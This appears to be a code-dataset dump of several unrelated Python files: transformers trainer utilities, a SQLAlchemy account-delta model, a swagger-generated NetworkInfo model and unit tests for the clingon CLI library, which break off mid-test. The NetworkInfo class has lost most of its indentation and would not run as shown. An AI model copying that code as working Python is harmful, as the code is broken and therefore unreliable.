class EvaluationStrategy(ExplicitEnum):
    """When to run evaluation during training: never, every N steps, or per epoch."""
    NO = "no"
    STEPS = "steps"
    EPOCH = "epoch"
class BestRun(NamedTuple):
    """
    The best run found by an hyperparameter search (see :class:`~transformers.Trainer.hyperparameter_search`).
    Parameters:
        run_id (:obj:`str`):
            The id of the best run (if models were saved, the corresponding checkpoint will be in the folder ending
            with run-{run_id}).
        objective (:obj:`float`):
            The objective that was obtained for this run.
        hyperparameters (:obj:`Dict[str, Any]`):
            The hyperparameters picked to get this run.
    """
    run_id: str
    objective: float
    hyperparameters: Dict[str, Any]
def default_compute_objective(metrics: Dict[str, float]) -> float:
    """
    The default objective to maximize/minimize when doing an hyperparameter search. It is the evaluation loss if no
    metrics are provided to the :class:`~transformers.Trainer`, the sum of all metrics otherwise.
    Args:
        metrics (:obj:`Dict[str, float]`): The metrics returned by the evaluate method.
    Return:
        :obj:`float`: The objective to minimize or maximize
    """
    # bug fix: work on a shallow copy so the caller's metrics dict is not
    # mutated by the pops below.
    metrics = dict(metrics)
    loss = metrics.pop("eval_loss", None)
    _ = metrics.pop("epoch", None)  # epoch is bookkeeping, never part of the objective
    return loss if len(metrics) == 0 else sum(metrics.values())
def default_hp_space_optuna(trial) -> Dict[str, float]:
    """Default Optuna search space: learning rate, epochs, seed and batch size."""
    from .integrations import is_optuna_available
    # NOTE: assert-based dependency check — stripped when running with -O.
    assert is_optuna_available(), "This function needs Optuna installed: `pip install optuna`"
    return {
        "learning_rate": trial.suggest_float("learning_rate", 1e-6, 1e-4, log=True),
        "num_train_epochs": trial.suggest_int("num_train_epochs", 1, 5),
        "seed": trial.suggest_int("seed", 1, 40),
        "per_device_train_batch_size": trial.suggest_categorical("per_device_train_batch_size", [4, 8, 16, 32, 64]),
    }
def default_hp_space_ray(trial) -> Dict[str, float]:
    """Default Ray Tune search space, mirroring the Optuna one above."""
    from .integrations import is_ray_available
    assert is_ray_available(), "This function needs ray installed: `pip install ray[tune]`"
    from ray import tune
    return {
        "learning_rate": tune.loguniform(1e-6, 1e-4),
        "num_train_epochs": tune.choice(list(range(1, 6))),
        "seed": tune.uniform(1, 40),
        "per_device_train_batch_size": tune.choice([4, 8, 16, 32, 64]),
    }
class HPSearchBackend(ExplicitEnum):
    """Supported hyperparameter-search backends."""
    OPTUNA = "optuna"
    RAY = "ray"
# Backend -> default search-space factory dispatch table.
default_hp_space = {
    HPSearchBackend.OPTUNA: default_hp_space_optuna,
    HPSearchBackend.RAY: default_hp_space_ray,
}
def nested_concat(tensors, new_tensors, dim=0):
    "Concat the `new_tensors` to `tensors` on `dim`. Works for tensors or nested list/tuples of tensors."
    if is_torch_available():
        # Both arguments must have the same nesting structure; the container
        # type (list vs tuple) is preserved in the result.
        assert type(tensors) == type(
            new_tensors
        ), f"Expected `tensors` and `new_tensors` to have the same type but found {type(tensors)} and {type(new_tensors)}."
        if isinstance(tensors, (list, tuple)):
            return type(tensors)(nested_concat(t, n, dim) for t, n in zip(tensors, new_tensors))
        return torch.cat((tensors, new_tensors), dim=dim)
    else:
        raise ImportError("Torch must be installed to use `nested_concat`")
def nested_numpify(tensors):
    "Numpify `tensors` (even if it's a nested list/tuple of tensors)."
    if isinstance(tensors, (list, tuple)):
        # Recurse while preserving the container type (list vs tuple).
        container = type(tensors)
        return container(nested_numpify(member) for member in tensors)
    # Leaf: move to host memory and convert to a numpy array.
    return tensors.cpu().numpy()
def nested_detach(tensors):
    "Detach `tensors` (even if it's a nested list/tuple of tensors)."
    if isinstance(tensors, (list, tuple)):
        # Recurse while preserving the container type (list vs tuple).
        wrapper = type(tensors)
        return wrapper(nested_detach(member) for member in tensors)
    # Leaf: detach the tensor from the autograd graph.
    return tensors.detach()
def nested_xla_mesh_reduce(tensors, name):
    """Mesh-reduce `tensors` across XLA/TPU devices via torch.cat, preserving
    nested list/tuple structure. `name` tags the reduction (suffixed per element)."""
    if is_torch_tpu_available():
        import torch_xla.core.xla_model as xm
        if isinstance(tensors, (list, tuple)):
            # Each nested element needs a distinct rendezvous name, hence the suffix.
            return type(tensors)(nested_xla_mesh_reduce(t, f"{name}_{i}") for i, t in enumerate(tensors))
        return xm.mesh_reduce(name, tensors, torch.cat)
    else:
        raise ImportError("Torch xla must be installed to use `nested_xla_mesh_reduce`")
def distributed_concat(tensor: "torch.Tensor", num_total_examples: Optional[int] = None) -> "torch.Tensor":
    """All-gather `tensor` from every distributed process and concatenate on dim 0,
    preserving nested list/tuple structure. If `num_total_examples` is given, the
    result is truncated to that length (drops SequentialDistributedSampler padding)."""
    if is_torch_available():
        try:
            if isinstance(tensor, (tuple, list)):
                return type(tensor)(distributed_concat(t, num_total_examples) for t in tensor)
            # Pre-allocate one buffer per rank, then gather everyone's tensor.
            output_tensors = [tensor.clone() for _ in range(torch.distributed.get_world_size())]
            torch.distributed.all_gather(output_tensors, tensor)
            concat = torch.cat(output_tensors, dim=0)
            # truncate the dummy elements added by SequentialDistributedSampler
            if num_total_examples is not None:
                concat = concat[:num_total_examples]
            return concat
        except AssertionError:
            # torch.distributed raises AssertionError when the process group is not initialized.
            raise AssertionError("Not currently using distributed training")
    else:
        raise ImportError("Torch must be installed to use `distributed_concat`")
def distributed_broadcast_scalars(
    scalars: List[Union[int, float]], num_total_examples: Optional[int] = None
) -> "torch.Tensor":
    """Gather a list of python scalars from every distributed process into one
    concatenated CUDA tensor, optionally truncated to `num_total_examples`
    (drops SequentialDistributedSampler padding)."""
    if is_torch_available():
        try:
            # NOTE(review): assumes CUDA is available on every rank — confirm.
            tensorized_scalar = torch.Tensor(scalars).cuda()
            output_tensors = [tensorized_scalar.clone() for _ in range(torch.distributed.get_world_size())]
            torch.distributed.all_gather(output_tensors, tensorized_scalar)
            concat = torch.cat(output_tensors, dim=0)
            # truncate the dummy elements added by SequentialDistributedSampler
            if num_total_examples is not None:
                concat = concat[:num_total_examples]
            return concat
        except AssertionError:
            # torch.distributed raises AssertionError when the process group is not initialized.
            raise AssertionError("Not currently using distributed training")
    else:
        raise ImportError("Torch must be installed to use `distributed_broadcast_scalars`")
| StarcoderdataPython |
4832937 | from common.sql.datetime import DateTime
from common.sql.uuid import UUID
from common.utils.datetime import get_current_datetime
from common.utils.uuid import generate_uuid4
from sqlalchemy import Column, Integer
from backend.sql.base import Base
class AccountDeltaGroup(Base):
    """A user's group of account deltas, tied to a cryptographic challenge and
    tracked through a transaction lifecycle before audit publication."""
    __tablename__ = "AccountDeltaGroup"
    uuid = Column(UUID, primary_key=True, default=generate_uuid4)
    # Owning user (indexed for per-user listing queries).
    user_uuid = Column(UUID, nullable=False, index=True)
    # pointer to the field in the challenge table
    # the challenge incorporates the exchange request uuid, along with the nizks for each currency.
    # it should be cryptographically constructed
    challenge_uuid = Column(UUID, nullable=False)
    status = Column(Integer, nullable=False)  # TransactionStatus enum
    # An AccountDeltas should be published in the audit only when the status is COMPLETED
    audit_publish_version = Column(Integer)
    add_to_audit_timestamp = Column(DateTime)
    # Adding a timestamp for a stable list ordering
    created_at = Column(DateTime, default=get_current_datetime, nullable=False)
| StarcoderdataPython |
189472 | # coding: utf-8
"""
Copyright 2015 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
class NetworkInfo(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
NetworkInfo - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'adv_state': 'str',
'cur_down_frame_size': 'int',
'cur_net_time': 'datetime',
'cur_sys_time': 'datetime',
'latency': 'int',
'lost_packet_count': 'int',
'net_queue_size': 'int',
'net_start_sys_time': 'datetime',
'num_motes': 'int',
'path_stability': 'float',
'reliability': 'float',
'reuse_mode': 'str',
'rx_packet_count': 'int',
'user_queue_size': 'int'
}
self.attribute_map = {
'adv_state': 'advState',
'cur_down_frame_size': 'curDownFrameSize',
'cur_net_time': 'curNetTime',
'cur_sys_time': 'curSysTime',
'latency': 'latency',
'lost_packet_count': 'lostPacketCount',
'net_queue_size': 'netQueueSize',
'net_start_sys_time': 'netStartSysTime',
'num_motes': 'numMotes',
'path_stability': 'pathStability',
'reliability': 'reliability',
'reuse_mode': 'reuseMode',
'rx_packet_count': 'rxPacketCount',
'user_queue_size': 'userQueueSize'
}
self._adv_state = None
self._cur_down_frame_size = None
self._cur_net_time = None
self._cur_sys_time = None
self._latency = None
self._lost_packet_count = None
self._net_queue_size = None
self._net_start_sys_time = None
self._num_motes = None
self._path_stability = None
self._reliability = None
self._reuse_mode = None
self._rx_packet_count = None
self._user_queue_size = None
@property
def adv_state(self):
"""
Gets the adv_state of this NetworkInfo.
State of network advertising
:return: The adv_state of this NetworkInfo.
:rtype: str
"""
return self._adv_state
@adv_state.setter
def adv_state(self, adv_state):
"""
Sets the adv_state of this NetworkInfo.
State of network advertising
:param adv_state: The adv_state of this NetworkInfo.
:type: str
"""
allowed_values = ["off", "on"]
if adv_state not in allowed_values:
raise ValueError(
"Invalid value for `adv_state`, must be one of {0}"
.format(allowed_values)
)
self._adv_state = adv_state
@property
def cur_down_frame_size(self):
"""
Gets the cur_down_frame_size of this NetworkInfo.
Current downstream frame size (in number of timeslots)
:return: The cur_down_frame_size of this NetworkInfo.
:rtype: int
"""
return self._cur_down_frame_size
@cur_down_frame_size.setter
def cur_down_frame_size(self, cur_down_frame_size):
"""
Sets the cur_down_frame_size of this NetworkInfo.
Current downstream frame size (in number of timeslots)
:param cur_down_frame_size: The cur_down_frame_size of this NetworkInfo.
:type: int
"""
self._cur_down_frame_size = cur_down_frame_size
@property
def cur_net_time(self):
"""
Gets the cur_net_time of this NetworkInfo.
Current network time
:return: The cur_net_time of this NetworkInfo.
:rtype: datetime
"""
return self._cur_net_time
@cur_net_time.setter
def cur_net_time(self, cur_net_time):
"""
Sets the cur_net_time of this NetworkInfo.
Current network time
:param cur_net_time: The cur_net_time of this NetworkInfo.
:type: datetime
"""
self._cur_net_time = cur_net_time
@property
def cur_sys_time(self):
"""
Gets the cur_sys_time of this NetworkInfo.
Current system time
:return: The cur_sys_time of this NetworkInfo.
:rtype: datetime
"""
return self._cur_sys_time
@cur_sys_time.setter
def cur_sys_time(self, cur_sys_time):
"""
Sets the cur_sys_time of this NetworkInfo.
Current system time
:param cur_sys_time: The cur_sys_time of this NetworkInfo.
:type: datetime
"""
self._cur_sys_time = cur_sys_time
@property
def latency(self):
"""
Gets the latency of this NetworkInfo.
Average network latency, in milliseconds*
:return: The latency of this NetworkInfo.
:rtype: int
"""
return self._latency
@latency.setter
def latency(self, latency):
"""
Sets the latency of this NetworkInfo.
Average network latency, in milliseconds*
:param latency: The latency of this NetworkInfo.
:type: int
"""
self._latency = latency
@property
def lost_packet_count(self):
"""
Gets the lost_packet_count of this NetworkInfo.
Number of lost packets accumulated over all motes*
:return: The lost_packet_count of this NetworkInfo.
:rtype: int
"""
return self._lost_packet_count
@lost_packet_count.setter
def lost_packet_count(self, lost_packet_count):
"""
Sets the lost_packet_count of this NetworkInfo.
Number of lost packets accumulated over all motes*
:param lost_packet_count: The lost_packet_count of this NetworkInfo.
:type: int
"""
self._lost_packet_count = lost_packet_count
@property
def net_queue_size(self):
"""
Gets the net_queue_size of this NetworkInfo.
Number of outstanding network management commands queued up to the network
:return: The net_queue_size of this NetworkInfo.
:rtype: int
"""
return self._net_queue_size
@net_queue_size.setter
def net_queue_size(self, net_queue_size):
"""
Sets the net_queue_size of this NetworkInfo.
Number of outstanding network management commands queued up to the network
:param net_queue_size: The net_queue_size of this NetworkInfo.
:type: int
"""
self._net_queue_size = net_queue_size
@property
def net_start_sys_time(self):
"""
Gets the net_start_sys_time of this NetworkInfo.
Time at which the first AP mote joined the manager, in ISO-8601 format. This value is reset every time the number of connected AP motes goes from zero to one
:return: The net_start_sys_time of this NetworkInfo.
:rtype: datetime
"""
return self._net_start_sys_time
@net_start_sys_time.setter
def net_start_sys_time(self, net_start_sys_time):
"""
Sets the net_start_sys_time of this NetworkInfo.
Time at which the first AP mote joined the manager, in ISO-8601 format. This value is reset every time the number of connected AP motes goes from zero to one
:param net_start_sys_time: The net_start_sys_time of this NetworkInfo.
:type: datetime
"""
self._net_start_sys_time = net_start_sys_time
@property
def num_motes(self):
"""
Gets the num_motes of this NetworkInfo.
Number of motes in the network
:return: The num_motes of this NetworkInfo.
:rtype: int
"""
return self._num_motes
@num_motes.setter
def num_motes(self, num_motes):
"""
Sets the num_motes of this NetworkInfo.
Number of motes in the network
:param num_motes: The num_motes of this NetworkInfo.
:type: int
"""
self._num_motes = num_motes
@property
def path_stability(self):
"""
Gets the path_stability of this NetworkInfo.
Accumulated path stability, % of unicast packets that were transmitted and resulted in a correctly received ACK at the MAC layer. A negative value means not enough data has been collected.*
:return: The path_stability of this NetworkInfo.
:rtype: float
"""
return self._path_stability
@path_stability.setter
def path_stability(self, path_stability):
"""
Sets the path_stability of this NetworkInfo.
Accumulated path stability, % of unicast packets that were transmitted and resulted in a correctly received ACK at the MAC layer. A negative value means not enough data has been collected.*
:param path_stability: The path_stability of this NetworkInfo.
:type: float
"""
self._path_stability = path_stability
@property
def reliability(self):
"""
Gets the reliability of this NetworkInfo.
Accumulated network reliability, % of packets received from all motes. A negative value means not enough data has been collected.*
:return: The reliability of this NetworkInfo.
:rtype: float
"""
return self._reliability
@reliability.setter
def reliability(self, reliability):
"""
Sets the reliability of this NetworkInfo.
Accumulated network reliability, % of packets received from all motes. A negative value means not enough data has been collected.*
:param reliability: The reliability of this NetworkInfo.
:type: float
"""
self._reliability = reliability
@property
def reuse_mode(self):
"""
Gets the reuse_mode of this NetworkInfo.
Cell space reuse mode
:return: The reuse_mode of this NetworkInfo.
:rtype: str
"""
return self._reuse_mode
@reuse_mode.setter
def reuse_mode(self, reuse_mode):
"""
Sets the reuse_mode of this NetworkInfo.
Cell space reuse mode
:param reuse_mode: The reuse_mode of this NetworkInfo.
:type: str
"""
allowed_values = ["N/A", "none", "upstream", "all"]
if reuse_mode not in allowed_values:
raise ValueError(
"Invalid value for `reuse_mode`, must be one of {0}"
.format(allowed_values)
)
self._reuse_mode = reuse_mode
@property
def rx_packet_count(self):
"""
Gets the rx_packet_count of this NetworkInfo.
Number of packets received accumulated over all motes*
:return: The rx_packet_count of this NetworkInfo.
:rtype: int
"""
return self._rx_packet_count
@rx_packet_count.setter
def rx_packet_count(self, rx_packet_count):
"""
Sets the rx_packet_count of this NetworkInfo.
Number of packets received accumulated over all motes*
:param rx_packet_count: The rx_packet_count of this NetworkInfo.
:type: int
"""
self._rx_packet_count = rx_packet_count
@property
def user_queue_size(self):
"""
Gets the user_queue_size of this NetworkInfo.
Number of user packets in the queue
:return: The user_queue_size of this NetworkInfo.
:rtype: int
"""
return self._user_queue_size
@user_queue_size.setter
def user_queue_size(self, user_queue_size):
"""
Sets the user_queue_size of this NetworkInfo.
Number of user packets in the queue
:param user_queue_size: The user_queue_size of this NetworkInfo.
:type: int
"""
self._user_queue_size = user_queue_size
    def to_dict(self):
        """
        Returns the model properties as a dict
        """
        result = {}
        # Walk the declared swagger attributes; nested models expose to_dict()
        # and are serialized recursively (including inside lists).
        for attr, _ in iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            else:
                result[attr] = value
        return result
    def to_str(self):
        """
        Returns the string representation of the model
        """
        # pprint.pformat gives a stable, readable rendering of the dict form.
        return pformat(self.to_dict())
    def __repr__(self):
        """
        For `print` and `pprint`
        """
        return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
    def __ne__(self, other):
        """
        Returns true if both objects are not equal
        """
        # Delegates to __eq__ via the negated equality expression.
        return not self == other
| StarcoderdataPython |
1627170 | <reponame>francois-vincent/clingon<filename>tests/test_clingon.py
# -*- coding: utf-8 -*-
from __future__ import print_function
import mock
try:
# for py26
import unittest2 as unittest
except ImportError:
import unittest
try:
from collections import OrderedDict
except ImportError:
# for py26
from ordereddict import OrderedDict
from . import captured_output
from clingon import clingon
# this is to force decorator to delay execution of decorated function
clingon.DELAY_EXECUTION = True
clingon.DEBUG = False
test_version = '0.3.1'
# ---------- here are decorated functions under test -------------
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
@clingon.clize
def clized_default_shorts(p1, p2,
first_option='default_value',
second_option=5,
third_option=[4, 3],
last_option=False):
"""Help docstring
"""
print('%s %s %s %s %s %s' % (p1, p2, first_option, second_option, third_option, last_option))
@clingon.clize(first_option='1', second_option=('2', 's', 'so'))
def clized_spec_shorts(p1, p2,
first_option='default_value',
second_option=5,
third_option=[4, 3],
last_option=False):
if last_option:
return 12
print('%s %s %s %s %s %s' % (p1, p2, first_option, second_option, third_option, last_option))
@clingon.clize
def clized_that_raises():
raise RuntimeError('I just raise')
@clingon.clize
def clized_varargs(p1, p2,
option='default_value',
*varargs):
print('%s %s %s %s' % (p1, p2, option, varargs))
def version():
return '1.2.3'
# CLI function whose docstring contains {VERSION} and {message} placeholders;
# set_variables fills them (VERSION via the version() callable above), which
# also adds a --version | -V option to the generated CLI.
@clingon.clize
@clingon.set_variables(VERSION=version, message="you can dynamically customize help message !")
def clized_variables(p1, p2, long_name_option='default_value'):
    """Help docstring v{VERSION}
    {message}
    """
    pass
# Same as clized_variables but VERSION is a plain string and the single
# option keeps a one-letter short alias, changing the usage line layout.
@clingon.clize
@clingon.set_variables(VERSION='1.2.3', message="you can dynamically customize help message !")
def clized_variables_one_short(p1, p2, option='default_value'):
    """Help docstring v{VERSION}
    {message}
    """
    pass
# ---------- end of decorated functions under test --------------
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class TestDecoratorBasic(unittest.TestCase):
    """Tests for the clize decorator itself: argument validation at
    decoration time and the internal data structures (options, aliases,
    equivalence maps) built from a decorated function's signature."""

    def test_version(self):
        """Package version is exposed both via the module and the package."""
        self.assertEqual(clingon.__version__, test_version)
        import clingon as cli
        self.assertEqual(cli.__version__, test_version)

    def test_decorator_multiple_args(self):
        """clize rejects more than one positional argument."""
        with self.assertRaises(ValueError) as cm:
            clingon.clize(1, 2)
        message = cm.exception.args[0]
        self.assertEqual(message, "This decorator is for a function only")

    def test_decorator_args_not_function(self):
        """clize rejects a non-callable positional argument."""
        with self.assertRaises(ValueError) as cm:
            clingon.clize(1)
        message = cm.exception.args[0]
        self.assertEqual(message, "This decorator is for a function only")

    def test_decorator_kwargs_not_sequence(self):
        """Alias keyword values must be strings or tuples of strings."""
        with self.assertRaises(ValueError) as cm:
            clingon.clize(toto=1)
        message = cm.exception.args[0]
        self.assertEqual(message, "Decorator's keyword 'toto' value must be "
                                  "a string or a tuple of strings, found: 1")

    def test_kwargs(self):
        """Decorated functions may not take **kwargs."""
        def clized(*varargs, **keywargs):
            pass
        with self.assertRaises(TypeError) as cm:
            clingon.clize(clized)
        message = cm.exception.args[0]
        self.assertEqual(message, "Keywords parameter '**keywargs' is not allowed")

    def test_bad_spec_option(self):
        """An alias for a non-existent option is rejected."""
        def clized(option='default_value'):
            pass
        with self.assertRaises(ValueError) as cm:
            clingon.clize(bad_option='')(clized)
        message = cm.exception.args[0]
        self.assertEqual(message, "This option does not exists so can't be given an alias: bad_option")

    def test_internal_data(self):
        """The decorator derives options, short aliases and lookup maps
        from the keyword parameters of the wrapped function."""
        def clized(p1, p2,
                   first_option='default_value',
                   second_option=5,
                   third_option=[4, 3],
                   last_option=False,
                   *varargs):
            """docstring"""
            pass
        ret = clingon.clize(clized)
        self.assertEqual(ret.func.__name__, 'clized')
        self.assertEqual(ret.docstring, "docstring")
        self.assertEqual(ret.reqargs, ['p1', 'p2'])
        self.assertEqual(ret.varargs, 'varargs')
        # Long and auto-generated short options, both mapped to defaults.
        self.assertDictEqual(ret.options, {
            '--first-option': 'default_value',
            '-f': 'default_value',
            '--second-option': 5,
            '-s': 5,
            '--third-option': [4, 3],
            '-t': [4, 3],
            '--last-option': False,
            '-l': False,
        })
        # Long options only.
        self.assertDictEqual(ret._options, {
            '--first-option': 'default_value',
            '--second-option': 5,
            '--third-option': [4, 3],
            '--last-option': False,
        })
        self.assertDictEqual(ret.options_aliases, {
            'first_option': ['f'],
            'second_option': ['s'],
            'third_option': ['t'],
            'last_option': ['l']
        })
        # Every CLI spelling maps back to the python parameter name.
        self.assertDictEqual(ret.options_equ, {
            '--first-option': 'first_option',
            '-f': 'first_option',
            '--second-option': 'second_option',
            '-s': 'second_option',
            '--third-option': 'third_option',
            '-t': 'third_option',
            '--last-option': 'last_option',
            '-l': 'last_option'
        })
        self.assertEqual(ret.python_options,
                         OrderedDict([
                             ('first_option', 'default_value'),
                             ('second_option', 5),
                             ('third_option', [4, 3]),
                             ('last_option', False)
                         ]))

    def test_options_same_first_letter(self):
        """Only the first option with a given initial gets the short alias."""
        def clized(option_1=False,
                   option_2=5):
            pass
        ret = clingon.clize(clized)
        self.assertDictEqual(ret.options, {
            '--option-1': False,
            '-o': False,
            '--option-2': 5,
        })
        self.assertDictEqual(ret.options_aliases, {
            'option_1': ['o'],
            'option_2': [],
        })
        self.assertDictEqual(ret.options_equ, {
            '--option-1': 'option_1',
            '-o': 'option_1',
            '--option-2': 'option_2',
        })
# sys.exit is patched for the whole class: each test receives the mock as
# `sys_exit` and asserts on the exit code instead of the process exiting.
@mock.patch('sys.exit')
class TestDecorator(unittest.TestCase):
    """End-to-end tests of decorated functions: command-line parsing,
    option handling, error messages, help output and exit codes."""

    def test_default_no_option(self, sys_exit):
        with captured_output() as (out, err):
            clized_default_shorts('p1 p2')
        self.assertEqual(out.getvalue(),
                         "p1 p2 default_value 5 [4, 3] False\n")
        self.assertEqual(err.getvalue(), '')
        sys_exit.assert_called_with(0)

    def test_default_first_option(self, sys_exit):
        with captured_output() as (out, err):
            clized_default_shorts('p1 p2 --first-option specific_value')
        self.assertEqual(out.getvalue(),
                         "p1 p2 specific_value 5 [4, 3] False\n")
        self.assertEqual(err.getvalue(), '')
        sys_exit.assert_called_with(0)

    def test_default_second_option(self, sys_exit):
        with captured_output() as (out, err):
            clized_default_shorts('p1 p2 --second-option 10')
        self.assertEqual(out.getvalue(),
                         "p1 p2 default_value 10 [4, 3] False\n")
        self.assertEqual(err.getvalue(), '')
        sys_exit.assert_called_with(0)

    def test_default_third_option(self, sys_exit):
        """List option consumes as many values as its default has."""
        with captured_output() as (out, err):
            clized_default_shorts('p1 p2 --third-option 16 9')
        self.assertEqual(out.getvalue(),
                         "p1 p2 default_value 5 [16, 9] False\n")
        self.assertEqual(err.getvalue(), '')
        sys_exit.assert_called_with(0)

    def test_default_last_option(self, sys_exit):
        """Boolean option acts as a flag (no value)."""
        with captured_output() as (out, err):
            clized_default_shorts('p1 p2 --last-option')
        self.assertEqual(out.getvalue(),
                         "p1 p2 default_value 5 [4, 3] True\n")
        self.assertEqual(err.getvalue(), '')
        sys_exit.assert_called_with(0)

    def test_default_all_options(self, sys_exit):
        """Options may appear in any order after the positional params."""
        with captured_output() as (out, err):
            clized_default_shorts(
                'p1 p2 --third-option 16 9 --second-option 10 --first-option specific_value --last-option')
        self.assertEqual(out.getvalue(),
                         "p1 p2 specific_value 10 [16, 9] True\n")
        self.assertEqual(err.getvalue(), '')
        sys_exit.assert_called_with(0)

    def test_default_all_options_short(self, sys_exit):
        with captured_output() as (out, err):
            clized_default_shorts('p1 p2 -t 16 9 -s 10 -f specific_value -l')
        self.assertEqual(out.getvalue(),
                         "p1 p2 specific_value 10 [16, 9] True\n")
        self.assertEqual(err.getvalue(), '')
        sys_exit.assert_called_with(0)

    def test_option_bad_type(self, sys_exit):
        """A non-int value for an int option prints usage + error on stderr."""
        with captured_output() as (out, err):
            clized_default_shorts('p1 p2 --second-option x')
        self.assertEqual(err.getvalue(),
                         "usage: test_clingon.py p1 p2 [options] [--help | -?]\n"
                         "Argument of option --second-option has wrong type (<int> expected)\n")
        self.assertEqual(out.getvalue(), '')
        sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)

    def test_option_short_bad_type(self, sys_exit):
        with captured_output() as (out, err):
            clized_default_shorts('p1 p2 -s x')
        self.assertEqual(err.getvalue(),
                         "usage: test_clingon.py p1 p2 [options] [--help | -?]\n"
                         "Argument of option -s has wrong type (<int> expected)\n")
        self.assertEqual(out.getvalue(), '')
        sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)

    def test_option_list_bad_type(self, sys_exit):
        with captured_output() as (out, err):
            clized_default_shorts('p1 p2 --third-option 1 y')
        self.assertEqual(err.getvalue(),
                         'usage: test_clingon.py p1 p2 [options] [--help | -?]\n'
                         'Argument 2 of option --third-option has wrong type (<int> expected)\n')
        self.assertEqual(out.getvalue(), '')
        sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)

    def test_option_list_no_value(self, sys_exit):
        with captured_output() as (out, err):
            clized_default_shorts('p1 p2 -t')
        self.assertEqual(err.getvalue(),
                         "usage: test_clingon.py p1 p2 [options] [--help | -?]\n"
                         "Option '-t' should be followed by a list of 2 <int>, found 0\n")
        self.assertEqual(out.getvalue(), '')
        sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)

    def test_spec_option(self, sys_exit):
        """Explicit alias -1 (declared in the decorator) is recognized."""
        with captured_output() as (out, err):
            clized_spec_shorts('p1 p2 -1 specific_value')
        self.assertEqual(out.getvalue(),
                         "p1 p2 specific_value 5 [4, 3] False\n")
        self.assertEqual(err.getvalue(), '')
        sys_exit.assert_called_with(0)

    def test_spec_option_again(self, sys_exit):
        """Multi-character alias -so also maps to second_option."""
        with captured_output() as (out, err):
            clized_spec_shorts('p1 p2 -1 specific_value -so 12')
        self.assertEqual(out.getvalue(),
                         "p1 p2 specific_value 12 [4, 3] False\n")
        self.assertEqual(err.getvalue(), '')
        sys_exit.assert_called_with(0)

    def test_unknown_parameter(self, sys_exit):
        with captured_output() as (out, err):
            clized_default_shorts('p1 p2 p3')
        self.assertEqual(err.getvalue(),
                         "usage: test_clingon.py p1 p2 [options] [--help | -?]\n"
                         "Unrecognized parameter 'p3'\n")
        self.assertEqual(out.getvalue(), '')
        sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)

    def test_too_few_parameters(self, sys_exit):
        with captured_output() as (out, err):
            clized_default_shorts('p1')
        self.assertEqual(err.getvalue(),
                         "usage: test_clingon.py p1 p2 [options] [--help | -?]\n"
                         "Too few parameters (2 required)\n")
        self.assertEqual(out.getvalue(), '')
        sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)

    def test_duplicate_option(self, sys_exit):
        """The same option given via short and long form is an error."""
        with captured_output() as (out, err):
            clized_default_shorts('p1 p2 -l --last-option')
        self.assertEqual(err.getvalue(),
                         "Option '--last-option' found twice\n")
        self.assertEqual(out.getvalue(), '')
        sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)

    def test_option_missing_value(self, sys_exit):
        with captured_output() as (out, err):
            clized_default_shorts('p1 p2 -s')
        self.assertEqual(err.getvalue(),
                         "usage: test_clingon.py p1 p2 [options] [--help | -?]\n"
                         "Option '-s' should be followed by a <int>\n")
        self.assertEqual(out.getvalue(), '')
        sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)

    def test_return_integer(self, sys_exit):
        """An int returned by the function becomes the exit code."""
        with captured_output() as (out, err):
            clized_spec_shorts('p1 p2 -l')
        self.assertEqual(out.getvalue(), '')
        self.assertEqual(err.getvalue(), '')
        sys_exit.assert_called_with(12)

    def test_debug(self, sys_exit):
        """DEBUG mode traces call parameters and the exit code on stdout."""
        clingon.DEBUG = True
        try:
            with captured_output() as (out, err):
                clized_spec_shorts('p1 p2 -l')
        finally:
            clingon.DEBUG = False
        self.assertEqual(out.getvalue(), "clize call parameters: ['p1', 'p2', 'default_value', 5, [4, 3], True]\n"
                                         "Exit with code 12\n")
        self.assertEqual(err.getvalue(), "")
        sys_exit.assert_called_with(12)

    def test_help_output(self, sys_exit):
        """-? prints the docstring plus the auto-generated options block."""
        with captured_output() as (out, err):
            clized_default_shorts('-?')
        output = out.getvalue()
        self.assertIn(clized_default_shorts.docstring.strip(), output)
        self.assertIn("Options:\n"
                      "--first-option | -f <str> (default='default_value')\n"
                      "--second-option | -s <int> (default=5)\n"
                      "--third-option | -t <list of int> (default=[4, 3])\n"
                      "--last-option | -l (default=False)\n"
                      "--help | -? print this help", output)
        self.assertEqual(err.getvalue(), '')
        sys_exit.assert_called_with(0)

    def test_raise_nodebug(self, sys_exit):
        """Without DEBUG, exceptions are reported on stderr + error exit code."""
        with captured_output() as (out, err):
            clized_that_raises('')
        self.assertEqual(out.getvalue(), '')
        self.assertEqual(err.getvalue(), "I just raise\n")
        sys_exit.assert_called_with(clingon.SYSTEM_EXIT_ERROR_CODE)

    def test_raise_debug(self, sys_exit):
        """With DEBUG, the original exception propagates to the caller."""
        clingon.DEBUG = True
        try:
            with captured_output() as (out, err):
                self.assertRaises(RuntimeError, clized_that_raises, '')
